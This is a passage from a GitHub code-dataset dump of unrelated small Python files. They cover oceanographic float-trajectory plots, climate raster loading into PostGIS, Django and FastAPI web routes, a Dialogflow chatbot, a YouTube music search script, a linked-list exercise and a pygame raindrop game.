22})\n\nWeddellAllFloats.list = []\nall_floats = WeddellAllFloats()\nfor idx,dummy in enumerate(all_floats.list):\n print(idx)\n dummy.toa.set_observational_uncertainty(weddell_toa_noise)\n dummy.depth.set_observational_uncertainty(weddell_depth_noise)\n dummy.stream.set_observational_uncertainty(weddell_stream_noise)\n dummy.gps.interp_uncertainty = weddell_interp_noise\n obs_holder = ObsHolder(dummy)\n smooth =Smoother(dummy,all_floats.sources,obs_holder,process_position_noise=weddell_position_process,process_vel_noise =weddell_velocity_process)\n\nsmooth_toa_error = []\nsmooth_speed = []\nfor idx,dummy in enumerate(all_floats.list):\n print(idx)\n dist_error_list,toa_error_list,dist_list,soso_list,date_return_list,obs_list = dummy.toa.calculate_error_list(dummy.pos,dummy.pos_date)\n smooth_toa_error += toa_error_list\n smooth_speed += speed_calc(dummy.pos,dummy.pos_date)\nsmooth_speed = 
[x for x in smooth_speed]\nprint('mean smoother toa misfit was')\nprint(np.mean(smooth_toa_error))\nprint('smoother std was')\nprint(np.std(smooth_toa_error))\nprint('median smooth speed is')\nprint(np.median(smooth_speed))\nprint('mean smooth speed is')\nprint(np.mean(smooth_speed))\n\nfig = plt.figure(figsize=(12,12))\n\nplt.subplot(2,1,1)\nplt.hist(smooth_toa_error,bins=100)\nplt.yscale('log')\nplt.xlim([-70,70])\nplt.xlabel('Misfit (s)')\nplt.annotate('a',xy = (0.8,0.75),xycoords='axes fraction',zorder=10,size=28,bbox=dict(boxstyle=\"round\", fc=\"0.8\"),)\n\n\nplt.subplot(2,1,2)\nplt.hist(smooth_speed,bins=100)\nplt.yscale('log')\nplt.xlim([0,20])\nplt.xlabel('Speed ($km\\ day^{-1}$)')\nplt.annotate('b',xy = (0.8,0.75),xycoords='axes fraction',zorder=10,size=28,bbox=dict(boxstyle=\"round\", fc=\"0.8\"),)\nplt.savefig(file_handler.out_file('Figure_17'))\n\n\ndel all_floats\nall_floats = DIMESAllFloats()\nfor idx,dummy in enumerate(all_floats.list):\n print(idx)\n dummy.toa.set_observational_uncertainty(dimes_toa_noise)\n dummy.stream.set_observational_uncertainty(dimes_stream_noise)\n dummy.depth.set_observational_uncertainty(dimes_depth_noise)\n obs_holder = ObsHolder(dummy)\n smooth =Smoother(dummy,all_floats.sources,obs_holder,process_position_noise=dimes_position_process,process_vel_noise =dimes_velocity_process)\ntrj_dist_error = []\ntrj_toa_error = []\ntrj_speed = []\nsmooth_dist_error = []\nsmooth_toa_error = []\nsmooth_speed = []\nfor idx,dummy in enumerate(all_floats.list):\n print(idx)\n dist_error_list,toa_error_list,dist_list,soso_list,date_return_list,obs_list = dummy.toa.calculate_error_list(dummy.trj_pos,dummy.trj_date)\n trj_dist_error += dist_error_list\n trj_toa_error += toa_error_list\n trj_speed += speed_calc(dummy.trj_pos,dummy.trj_date)\n dist_error_list,toa_error_list,dist_list,soso_list,date_return_list,obs_list = dummy.toa.calculate_error_list(dummy.pos,dummy.pos_date)\n smooth_dist_error += dist_error_list\n smooth_toa_error += toa_error_list\n smooth_speed += speed_calc(dummy.pos,dummy.pos_date)\ntrj_diff_list = []\nfor idx,dummy in enumerate(all_floats.list):\n for pos,date in zip(dummy.trj_pos,dummy.trj_date):\n try:\n idx = dummy.pos_date.index(date)\n trj_diff_list.append(GreatCircleDistance(pos,dummy.pos[idx]).km)\n except:\n continue\n\nprint('mean ARTOA toa misfit was')\nprint(np.mean(trj_toa_error))\nprint('ARTOA std was')\nprint(np.std(trj_toa_error))\nprint('mean smoother toa misfit was')\nprint(np.mean(smooth_toa_error))\nprint('smoother std was')\nprint(np.std(smooth_toa_error))\nprint('median trj diff is')\nprint(np.median(trj_diff_list))\nprint('mean trj diff is')\nprint(np.mean(trj_diff_list))\nprint('median smooth speed is')\nprint(np.median(smooth_speed))\nprint('mean smooth speed is')\nprint(np.mean(smooth_speed))\nprint('median trj speed is')\nprint(np.median(trj_speed))\nprint('mean trj speed is')\nprint(np.mean(trj_speed))\n\n\nplt.figure(figsize=(13,13))\nplt.subplot(3,1,1)\nbins = np.linspace(-30,30,200)\ntrj_n,dummy,dummy = plt.hist(trj_toa_error,bins=bins,color='b',label='ARTOA',alpha=0.3)\nkalman_n,dummy,dummy = plt.hist(smooth_toa_error,bins=bins,color='g',label='Smoother',alpha=0.3)\nplt.yscale('log')\nplt.legend()\nplt.xlabel('Misfit (seconds)', fontsize=22)\nplt.annotate('a', xy = (0.2,0.75),xycoords='axes fraction',zorder=10,size=32,bbox=dict(boxstyle=\"round\", fc=\"0.8\"),)\nplt.subplot(3,1,2)\nbins = np.linspace(0,300,40)\nplt.xlim([0,300])\nplt.hist(trj_diff_list,bins=bins)\nplt.yscale('log')\nplt.xlabel('Trajectory 
Difference (km)', fontsize=22)\nplt.annotate('b', xy = (0.2,0.75),xycoords='axes fraction',zorder=10,size=32,bbox=dict(boxstyle=\"round\", fc=\"0.8\"),) \nplt.subplot(3,1,3)\nbins = np.linspace(0,41,30)\nplt.hist(smooth_speed,bins=bins,color='g',label='Kalman',alpha=0.3)\nplt.hist(trj_speed,bins=bins,color='b',label='DIMES',alpha=0.3)\nplt.yscale('log')\nplt.annotate('c', xy = (0.8,0.7),xycoords='axes fraction',zorder=10,size=32,bbox=dict(boxstyle=\"round\", fc=\"0.8\"),) \nplt.xlim([0,35])\n# plt.yscale('log')\nplt.xlabel('Speed (km $day^{-1}$)', fontsize=22)\nplt.subplots_adjust(hspace=0.3)\nplt.savefig(file_handler.out_file('Figure_11'))\nplt.close()","repo_name":"Chamberpain/KalmanSmoother","sub_path":"Utilities/Plots/Figure_13_And_17.py","file_name":"Figure_13_And_17.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73169876944","text":"import rasterio\nfrom builder import climate_db\nfrom psycopg2.extras import execute_values\nimport numpy\nimport geojson\nfrom rasterio.plot import show\nfrom pyproj import Transformer\n\nseasons = [\"winter\",\"spring\",\"summer\",\"autumn\",\"annual\"]\ndecades = [\"1980\",\"1990\",\"2000\",\"2010\",\"2020\",\n \"2030\",\"2040\",\"2050\",\"2060\",\"2070\"]\n\ndef nuke(db,table):\n data_cols={\n table: [[\"id\",\"serial primary key\"]]\n }\n\n # optimising for reading - store all the variables for each decade\n # together, this means it's a single select averaging them together\n # across primary key location ids\n for decade in decades:\n data_cols[table].append([\"tas_\"+decade,\"real\"])\n data_cols[table].append([\"tasmax_\"+decade,\"real\"])\n data_cols[table].append([\"tasmin_\"+decade,\"real\"])\n data_cols[table].append([\"sfcWind_\"+decade,\"real\"])\n data_cols[table].append([\"pr_\"+decade,\"real\"])\n data_cols[table].append([\"rsds_\"+decade,\"real\"])\n\n db.create_tables(data_cols)\n\ndef test_print(arr,w,h): \n for x in range(0,h,10):\n r = \"\"\n for y in range(0,w,10):\n v=arr[x][y]\n if v<-9999: r+=\" \"\n else: r+=str(int(v))\n print(r)\n\ndef print_check(t,start,end,skip):\n seasons = [\"winter\",\"spring\",\"summer\",\"autumn\"]\n print(int(t/4)+1980,seasons[t%4],int(start/4)+1980,int(end/4)+1980)\n \ndef avg_slice(start,end,skip,img):\n count=0\n total=0\n arr=numpy.zeros((img.height,img.width),numpy.float)\n for t in range(start,end,skip):\n print_check(t,start,end,skip)\n image = img.read(t+1)\n count+=1\n arr=arr+image\n arr/=count\n test_print(arr,img.width,img.height)\n return arr\n\ndef build_season_avg(img,season):\n return [avg_slice(season+d*40,season+(d+1)*40,4,img) for d in range(0,10)]\n\ndef build_avg(img):\n return [avg_slice(d*40,(d+1)*40,1,img) for d in range(0,10)]\n\ndef save_tiff(img,arr,table,rcp,variable,season,decade):\n with rasterio.Env():\n profile = img.profile\n profile.update(\n dtype=rasterio.float32,\n count=1,\n compress='lzw')\n\n fn = table+'_'+rcp+'_'+variable+'_'+seasons[season]+'_'+decades[decade]+'.tif'\n \n with rasterio.open(fn, 'w', **profile) as dst:\n dst.write(arr.astype(rasterio.float32), 1)\n\ndef save_averages(db,rcp,fn,table,variable):\n img = rasterio.open(fn)\n \n for decade in range(0,10):\n # winter/summer\n for season in [0,2]:\n print(rcp,variable)\n arr=avg_slice(season+decade*40,season+(decade+1)*40,4,img)\n save_tiff(img,arr,table,rcp,variable,season,decade);\n \n # annual\n for decade in range(0,10):\n print(rcp,variable)\n arr = 
avg_slice(decade*40,(decade+1)*40,1,img)\n save_tiff(img,arr,table,rcp,variable,4,decade);\n\n\ndef print_crs(fn):\n print(\"hello\")\n img = rasterio.open(fn)\n print(img.crs)\n\n \ndef load_grid(db,fn):\n img = rasterio.open(fn)\n\n print(img.crs)\n \n time_size = img.count\n x_size = img.width\n y_size = img.height\n\n data_cols = {\n \"chess_scape_grid\":\n [[\"id\",\"serial\"],\n [\"geom\",\"geometry(geometry, 4326)\"],\n [\"properties\",\"jsonb\"]],\n }\n\n db.create_tables(data_cols)\n\n transformer = Transformer.from_crs(img.crs, 4326) \n\n features = []\n # assumptions to check - coord is centre of pixel?\n for x in range(0,x_size):\n for y in range(0,y_size):\n\n pos = img.xy(y,x)\n \n a = transformer.transform(pos[0]-500,pos[1]-500)\n b = transformer.transform(pos[0]+500,pos[1]-500)\n c = transformer.transform(pos[0]+500,pos[1]+500)\n d = transformer.transform(pos[0]-500,pos[1]+500)\n\n # lat/lng = y/x\n features.append(geojson.Feature(id=x*y_size+y, geometry=geojson.Polygon([[\n (a[1],a[0]),(b[1],b[0]),(c[1],c[0]),(d[1],d[0])]],properties={})))\n print(\"loading grid \"+str(int((x/x_size)*100))+\"%\")\n \n db.import_geojson_feature(\"chess_scape_grid\",\"4326\",geojson.FeatureCollection(features))\n db.conn.commit()\n\n \ndef load_data(db,fn,table,decade,variable):\n img = rasterio.open(fn)\n\n vardec = variable+'_'+decade\n \n time_size = img.count\n x_size = img.width\n y_size = img.height\n\n print(\"updating: \"+table+\" \"+variable+\" decade:\"+decade)\n\n for y in range(0,y_size):\n values = img.read(1)[y]\n dat = []\n for x in range(0,x_size):\n value = values[x]\n grid_id = x*y_size+y\n if value > -9999:\n dat.append([grid_id,float(value)])\n\n\n q=f\"\"\"with new_values (id,{vardec}) as (values %s),\n upsert as ( update {table} m set {vardec} = nv.{vardec}\n from new_values nv\n where m.id = nv.id\n returning m.* )\n insert into {table} (id,{vardec})\n select id,{vardec}\n from new_values\n where not exists (select 1 from upsert up where up.id=new_values.id)\"\"\"\n \n #q=f\"insert into {table} (location,season,{variable}) values %s on conflict (location,season) do update set {variable} = excluded.{variable};\"\n execute_values(db.cur,q,dat)\n db.conn.commit()\n \ndef test_data(db,fn,table,variable):\n img = rasterio.open(fn)\n \n for x in range(0,img.height,10):\n r = \"\"\n for y in range(0,img.width,10):\n v=img.read(1)[x][y]\n if v>-9999: r+=\" \"\n else: r+=str(int(v))\n print(r)\n\ndef import_tiffs(db,path,rcp,variable):\n for season in [\"annual\",\"summer\",\"winter\"]:\n for decade in [\"1980\",\"1990\",\"2000\",\"2010\",\"2020\",\n \"2030\",\"2040\",\"2050\",\"2060\",\"2070\"]:\n fn = 'chess_scape_'+rcp+'_'+variable+'_'+season+'_'+decade+'.tif'\n load_data(db,path+fn,'chess_scape_'+rcp+'_'+season,decade,variable)\n\ndef import_grid(db,path,fn):\n load_grid(db,path+fn)\n \ndef create_averages(db,rcp,path,variable):\n fn = \"chess-scape_\"+rcp+\"_bias-correctedMEAN_\"+variable+\".tif\"\n save_averages(db,rcp,path+fn,\"chess_scape\",variable)\n\n","repo_name":"UniExeterRSE/LCAT","sub_path":"data/builder/tiff_loader.py","file_name":"tiff_loader.py","file_ext":"py","file_size_in_byte":6208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42203838811","text":"from django.urls import path, include\n\nfrom . 
import views\nfrom django.contrib.auth import views as auth_views\n\nurlpatterns = [\n path('', views.post_list, name=\"posts\"),\n # path('login',views.post_login,name=\"login\"),\n path('register', include('users.urls')),\n path('login', auth_views.LoginView.as_view(\n template_name='posts/login.html'), name='login'),\n path('logout', auth_views.LogoutView.as_view(\n template_name='posts/logout.html'), name='logout'),\n\n path('create', views.post_create, name=\"create\"),\n path('', views.post_detail, name=\"detail\"),\n path('/edit', views.post_update, name=\"update\"),\n path('/delete', views.post_delete, name=\"delete\"),\n\n\n]\n","repo_name":"asb19/My-Python-Projects","sub_path":"amir/posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39444375086","text":"from deepcardio_utils import ImageReader, plot_cell\n\nif __name__=='__main__':\n imageReader = ImageReader(rollingSize=3)\n images = imageReader.get_full_images()\n classes = imageReader.get_frame_wise_class_gmm()\n pixelClass = imageReader.get_pixel_wise_classification()\n\n idx = 3\n im = images[idx].copy()\n im[:, :, 1] = pixelClass[idx]*50\n plot_cell(im)","repo_name":"raulbenitez/DEEPCARDIO","sub_path":"sparks/train/generatePixelWiseClass.py","file_name":"generatePixelWiseClass.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42040666098","text":"'''\r\nCreated on Jan 11, 2011\r\n\r\n@author: Chris Greenough - Chris.Greenough@nau.edu\r\n'''\r\nfrom bbwsdl.NauService_services import *\r\nfrom bbwsdl.NauService_services_types import *\r\nimport logging\r\nclass NauService(object):\r\n log=logging.getLogger(\"NauService\")\r\n port=None\r\n sigHandler=None\r\n def __init__(self,sigHandler, baseUrl=None):\r\n self.sigHandler=sigHandler\r\n \r\n locator = NauServiceLocator()\r\n self.port=locator.getNauServicePortType(baseUrl)\r\n self.port.binding.sig_handler=self.sigHandler\r\n \r\n self.log.info(\"Connecting to NauService\")\r\n def batchChangeEnrollmentStatus(self,courseBatchUid,peopleBatchUids,disabled=False):\r\n request = BatchChangeEnrollmentStatusRequest()\r\n request._courseBatchUid=courseBatchUid\r\n request._peopleBatchUid=peopleBatchUids\r\n request._disabled=disabled\r\n response = self.port.BatchChangeEnrollmentStatus(request)\r\n return response._return\r\n \r\n def getIdsFromBatchUids(self, batchUids):\r\n request = GetIdsFromBatchUidsRequest()\r\n request._batchUids=batchUids\r\n responses = self.port.GetIdsFromBatchUids(request)\r\n ## Return $ delimited into hash\r\n ret = dict()\r\n for response in responses._return:\r\n parts=response.split(\"$\")\r\n ret[parts[0]]=parts[1]\r\n return ret\r\n \r\n def changeEnrollmentStatus(self,courseBatchUid,personBatchUid,disabled=False):\r\n request = ChangeEnrollmentStatusRequest()\r\n request._courseBatchUid=courseBatchUid\r\n request._personBatchUid=personBatchUid\r\n request._disabled=disabled\r\n response = self.port.ChangeEnrollmentStatus(request)\r\n return response._return\r\n \r\n def rollupCourse(self, parentBatchUid, childBatchUid, enable=True):\r\n request = RollupCourseRequest()\r\n request._parentBatchUid=parentBatchUid\r\n request._childBatchUid=childBatchUid\r\n request._enable=enable\r\n response=self.port.RollupCourse(request)\r\n return response._return\r\n \r\n def isRolledup(self, parentBatchUid, 
childBatchUid):\r\n request = IsRolledupRequest()\r\n request._parentBatchUid=parentBatchUid\r\n request._childBatchUid=childBatchUid\r\n response=self.port.IsRolledup(request)\r\n return response._return\r\n \r\n def createUpdateUser(self,studentId, firstName, lastName, email, userName, isAvailable=True):\r\n request = CreateUpdateUserRequest()\r\n request._studentId=studentId\r\n request._firstName=firstName\r\n request._lastName=lastName\r\n request._email=email\r\n request._userName=userName\r\n request._isAvailable=isAvailable\r\n response=self.port.CreateUpdateUser(request)\r\n return response._return","repo_name":"ebinezar/bbpy","sub_path":"bbpy/src/BbPy/NauService.py","file_name":"NauService.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30421676469","text":"from flask import Flask,request,render_template,url_for,jsonify\r\nimport os\r\nimport dialogflow\r\nfrom google.api_core.exceptions import InvalidArgument\r\n\r\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = 'watsappchatbot-ds-fwfj-5c66438b368f.json'\r\n\r\nDIALOGFLOW_PROJECT_ID = 'watsappchatbot-ds-fwfj'\r\nDIALOGFLOW_LANGUAGE_CODE = 'en'\r\nSESSION_ID = 'me'\r\n\r\napp=Flask(__name__)\r\n\r\n@app.route('/')\r\ndef home():\r\n \r\n return render_template('home.html')\r\n\r\n\r\n\r\n@app.route('/predict',methods=['POST'])\r\ndef predict():\r\n \r\n if request.method=='POST':\r\n text_to_be_analyzed=request.form['message']\r\n\r\n\r\n\r\n session_client = dialogflow.SessionsClient()\r\n session = session_client.session_path(DIALOGFLOW_PROJECT_ID, SESSION_ID)\r\n text_input = dialogflow.types.TextInput(text=text_to_be_analyzed, language_code=DIALOGFLOW_LANGUAGE_CODE)\r\n query_input = dialogflow.types.QueryInput(text=text_input)\r\n try:\r\n response = session_client.detect_intent(session=session, query_input=query_input)\r\n except InvalidArgument:\r\n raise\r\n \r\n print(\"Query text:\", response.query_result.query_text)\r\n print(\"Detected intent:\", response.query_result.intent.display_name)\r\n print(\"Detected intent confidence:\", response.query_result.intent_detection_confidence)\r\n print(\"Fulfillment text:\", response.query_result.fulfillment_text)\r\n return render_template('home.html',pre=response.query_result.fulfillment_text)\r\nif __name__=='__main__':\r\n app.run(debug=True)\r\n","repo_name":"meesala-BFRS01946/engage-dialogflow","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19640934022","text":"import get_names as get\r\nimport urllib.request\r\nimport urllib.parse\r\nimport re\r\nimport pafy\r\nimport youtube_dl\r\nimport collections\r\nimport wikipedia\r\nimport random\r\n\r\nresultStack = collections.deque()\r\nnames = get.get_name_list(\"fleetwood mac\", resultStack)\r\n\r\nsearch = ''\r\n\r\ndef ensure_search(search):\r\n global resultStack\r\n search = ytSearch(resultStack.popleft())\r\n\r\n while not len(search):\r\n search = ytSearch(resultStack.popleft())\r\n \r\n return search\r\n\r\ndef ytSearch(artist):\r\n query_string = urllib.parse.urlencode({\"search_query\" : artist})\r\n html_content = urllib.request.urlopen(\"http://www.youtube.com/results?\" + query_string)\r\n search_results = re.findall(r'href=\\\"\\/watch\\?v=(.{11})', html_content.read().decode())\r\n return search_results\r\n\r\ndef get_video(search):\r\n try:\r\n search = 
ensure_search(resultStack.popleft())\r\n videoPick = random.randrange(len(search) - 1)\r\n url = \"http://www.youtube.com/watch?v=\" + search[videoPick]\r\n video = pafy.new(url)\r\n except(youtube_dl.utils.DownloadError):\r\n search = ensure_search(resultStack.popleft())\r\n \r\n return video\r\n\r\ndef get_length(time):\r\n time = time.split(\":\")\r\n\r\n timeList = []\r\n timeList.append(int(time[0]))\r\n timeList.append(int(time[1]))\r\n\r\n return (timeList[0] == 0 and timeList[1] < 8)\r\n\r\nfor x in range(2000):\r\n\r\n video = get_video(search)\r\n time = get_length(video.duration)\r\n\r\n while(True):\r\n if video.category == \"Music\" and time:\r\n break\r\n else:\r\n print(\"in music check\")\r\n video = get_video(search)\r\n time = get_length(video.duration)\r\n \r\n best = video.getbestaudio()\r\n\r\n print(video.category)\r\n print(video.duration)\r\n print(video.keywords)\r\n print(best.url)\r\n\r\n get.get_name_list( resultStack.popleft() , resultStack)\r\n\r\n","repo_name":"randyajackson/wikiresearch","sub_path":"wikiresearch.py","file_name":"wikiresearch.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32277060929","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @File: scripts/create_custom_project_from_alyx.py\n# @Author: Niccolo' Bonacchi (@nbonacchi)\n# @Date: Tuesday, August 17th 2021, 5:21:16 pm\nimport iblrig.pybpod_config as pc\nimport argparse\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Create custom project, users, and subjects from Alyx\"\n )\n parser.add_argument(\"project_name\", help=\"Name of existing Alyx project\")\n args = parser.parse_args()\n pc.create_custom_project_from_alyx(args.project_name)\n","repo_name":"int-brain-lab/iblrig","sub_path":"scripts/create_custom_project_from_alyx.py","file_name":"create_custom_project_from_alyx.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"48"} +{"seq_id":"3101326375","text":"from pyppeteer import launch\nimport asyncio\n\n\nasync def get_elemets(page):\n\tawait page.waitForSelector(\"#input_text\")\n\n\tinput_text = await page.querySelector(\"#input_text\")\n\n\tsubmit_button = await page.querySelector(\"#submit_button\")\n\n\treturn input_text, submit_button\n\nasync def setup_browser():\n browser = await launch({\"args\":[\"--no-sandbox\",\"--disable-setuid-sandbox\"]})\n page = await browser.newPage()\n\n await page.goto(\"https://bellard.org/textsynth/\")\n\n input_text, submit_button = await get_elemets(page)\n\n return browser, page, input_text, submit_button\n\n\nasync def main():\n\twhile True:\n\t browser, page, input_text, submit_button = await setup_browser()\n\n\t await input_text.type(input(\">\") + \" \")\n\t await submit_button.click()\n\n\t gtext = await page.querySelector(\"#gtext\")\n\t await asyncio.sleep(5)\n\t result = await page.evaluate(\"(element) => element.innerText\",gtext)\n\n\t print(result)\n\n\t await browser.close()\n\n\n\t\n\t\n\n\n\nasyncio.get_event_loop().run_until_complete(main())\n\n\n","repo_name":"annasajkh/TextSynth-Interface","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"70625971026","text":"import tkinter as tk # import tkinter\r\nfrom PIL import Image, ImageTk\r\nfrom tkinter 
import ttk\r\n#from StallD import Display_Stall_Page\r\n\r\nclass StartPage(tk.Frame):\r\n\r\n def __init__(self, parent, controller):\r\n tk.Frame.__init__(self, parent)\r\n # image background\r\n img = ImageTk.PhotoImage(Image.open(\"fcseats.png\"))\r\n panel = tk.Label(self, image=img)\r\n panel.image = img\r\n panel.place(x=0, y=0, relwidth=1, relheight=1)\r\n style = ttk.Style()\r\n # defining a uniform style for button\r\n style.configure(\"MainHeading\", font='Times 24 italic')\r\n style.configure(\"SubHeading.TButton\", font='Helvetica 10')\r\n\r\n # title label on top\r\n TitleLabel= ttk.Label(self, text=\"Welcome to North Spine Food Canteen!\",font='Times 24 italic')\r\n TitleLabel.pack(padx=20, pady=10)\r\n # label for selecting the stall\r\n IntroLabel=tk.Label(self, text=\"Please select the stall\",font='Times 18')\r\n IntroLabel.pack(padx=10, pady=5)\r\n # list for holding names of stall\r\n OPTIONS=[\"Korean Stall\",\"Japanese Stall\",\"Chicken Rice Stall\",\"Miniwok Stall\",\"Malay Stall\"]\r\n self.var=tk.StringVar() # for getting the name of selected stall\r\n self.var.set(OPTIONS[0]) # setting an initial value to the drop down list and the selected stall\r\n # creating a drop down list for the stalls\r\n dropDownList = ttk.OptionMenu(self, self.var, *OPTIONS, style=\"option.TMenubutton\")\r\n dropDownList.pack(padx=10, pady=10)\r\n\r\n # button to the stall display page\r\n NextButton=ttk.Button(self,text=\"Next\", style=\"SubHeading.TButton\", command=lambda :controller.saveStall(self.var))\r\n NextButton.pack(padx=10,pady=10)\r\n # background for window\r\n def resize(self, event):\r\n img = Image.open(\"fcseats.png\").resize(\r\n (event.width, event.height), Image.ANTIALIAS\r\n )\r\n self.img = ImageTk.PhotoImage(img)\r\n self.canvas.itemconfig(self.canvas_img, image=self.img)\r\n","repo_name":"AsthaGarg16/North-Spine-Food-Canteen","sub_path":"StartPage.py","file_name":"StartPage.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13909482752","text":"from typing import Optional\n\nfrom fastapi import FastAPI, Depends, status, Response, HTTPException \n\nimport schemas, models\n\nfrom schemas import Article\nfrom models import ArticleModel\nfrom database import engine, SessionLocal\nfrom sqlalchemy.orm import Session\n\napp = FastAPI()\n\nmodels.Base.metadata.create_all(engine)\n\ndef get_db():\n db = SessionLocal()\n\n try:\n yield db\n finally:\n db.close()\n\n@app.post('/articles', status_code=status.HTTP_201_CREATED)\ndef create_article(article: Article, db: Session = Depends(get_db)):\n article = ArticleModel(title=article.title, body=article.body)\n db.add(article)\n db.commit()\n db.refresh(article)\n return article\n\n@app.get('/articles', status_code=status.HTTP_200_OK)\ndef get_articles(db: Session = Depends(get_db)):\n articles = db.query(ArticleModel).all()\n return articles\n\n@app.get('/articles/{id}', status_code=status.HTTP_200_OK)\ndef get_article(id: int, response: Response, db: Session = Depends(get_db)):\n article = db.query(ArticleModel).filter(ArticleModel.id == id).first()\n if not article:\n response.status_code = status.HTTP_404_NOT_FOUND\n return {\n 'message': f'Article with id {id} not found',\n 'article': None\n }\n return article\n\n@app.put('/articles/{id}')\ndef update_article(id: int, article: Article, db: Session = Depends(get_db)):\n articles = db.query(ArticleModel).filter(ArticleModel.id == id)\n if not articles.first():\n raise 
HTTPException(status_code=status.HTTP_404_NOT_FOUND, \n                            detail= f'Article with id {id} not found')\n    articles.update(article.dict(), synchronize_session=False)\n    db.commit()\n    return article\n\n@app.delete('/articles/{id}', status_code=status.HTTP_204_NO_CONTENT)\ndef delete_article(id: int, db: Session = Depends(get_db)):\n    articles = db.query(ArticleModel).filter(ArticleModel.id == id)\n    if not articles.first():\n        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, \n                            detail= f'Article with id {id} not found')\n    articles.delete(synchronize_session=False)\n    db.commit()\n    return\n\n\n\n\n","repo_name":"ivanmmarkovic/fastapi-blog","sub_path":"blog-v02-crud/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"17609782132","text":"# Interview question 22: the k-th node from the end of a linked list\n\n# Define the linked-list structure\nclass ListNode():\n    def __init__(self, value):\n        self.val = value\n        self.next = None\n\n# Build a linked list\ndef list2linked_list(values):\n    # Function: convert a list into a linked list\n    # Input: the list values and the value of the node to delete; output: the list head and that node\n    if not values:\n        return None\n    head = ListNode(values[0])\n    before_node = head\n    for num in values[1:]:\n        node = ListNode(num)\n        before_node.next = node\n        before_node = node\n    return head\n\ndef find_kth_to_tal(head, k):\n    if not head or k <= 0:\n        return None\n    pre_node = head\n    for _ in range(k):\n        if pre_node:\n            pre_node = pre_node.next\n        else:\n            return None\n    behind_node = head\n    while pre_node:\n        behind_node = behind_node.next\n        pre_node = pre_node.next\n    return behind_node\n\nif __name__ == '__main__':\n    k = 4\n    values = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']\n    head = list2linked_list(values)\n    print(find_kth_to_tal(head, k).val)","repo_name":"Real-Chen/Coding-Interviews","sub_path":"22_Kth_node_from_end.py","file_name":"22_Kth_node_from_end.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"35621763883","text":"#!/bin/env python3\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.decomposition import PCA\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nsns.set(style=\"ticks\", palette=\"pastel\")\n\n\ndef get_descriptive_plots(entry_data, out=False):\n    # Classification var\n    X_no_cat = pd.get_dummies(entry_data.drop('type', axis=1))\n\n    # Calculate correlation\n    corr = X_no_cat.corr()\n\n    # Descriptive statistics\n    fig, axs = plt.subplots(figsize=(18, 10), nrows=3, ncols=2)\n    plt.subplots_adjust(hspace=0.3)\n\n    sns.countplot(x=\"type\", data=entry_data, ax=axs[0, 0])\n    sns.countplot(y=\"type\", hue=\"color\", data=entry_data, ax=axs[0, 1])\n    sns.boxplot(x=\"rotting_flesh\", y=\"type\", data=entry_data, ax=axs[1, 0])\n    sns.boxplot(x=\"bone_length\", y=\"type\", data=entry_data, ax=axs[1, 1])\n    sns.boxplot(x=\"hair_length\", y=\"type\", data=entry_data, ax=axs[2, 0])\n    sns.boxplot(x=\"has_soul\", y=\"type\", data=entry_data, ax=axs[2, 1])\n\n    if out:\n        plt.savefig('./desc.png')\n        print(\"Data description plot saved in desc.png\")\n    else:\n        plt.show()\n\n    fig, axs = plt.subplots(figsize=(18, 10), nrows=1, ncols=2)\n    plt.subplots_adjust(hspace=0.3)\n    sns.heatmap(corr,\n                xticklabels=corr.columns.values,\n                yticklabels=corr.columns.values, ax=axs[0])\n    pca = PCA().fit(X_no_cat.values)\n    sns.lineplot(x=range(len(pca.explained_variance_ratio_)),\n                 y=np.cumsum(pca.explained_variance_ratio_), ax=axs[1])\\\n        .set_xticks(range(len(pca.explained_variance_ratio_)))\n    plt.xlabel('Components number')\n    
plt.ylabel('Cumulative explained variance')\n\n if out:\n plt.savefig('./correlation.png')\n print(\"Correlation plot saved in correlation.png\")\n else:\n plt.show()\n","repo_name":"guilhem-barthes/practical-data-science","sub_path":"creature-predictions/script/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24427474212","text":"import pygame\r\nfrom pygame.sprite import Group\r\n\r\nfrom settings import Settings\r\nimport game_functions as gf\r\n\r\ndef run_game():\r\n # Initialize game and create screen object.\r\n pygame.init()\r\n ai_settings = Settings()\r\n screen = pygame.display.set_mode(\r\n (ai_settings.screen_width, ai_settings.screen_height))\r\n pygame.display.set_caption(\"Raindrop\")\r\n \r\n # Make a group of raindrops\r\n raindrops = Group()\r\n \r\n # Create the grid of raindrops\r\n 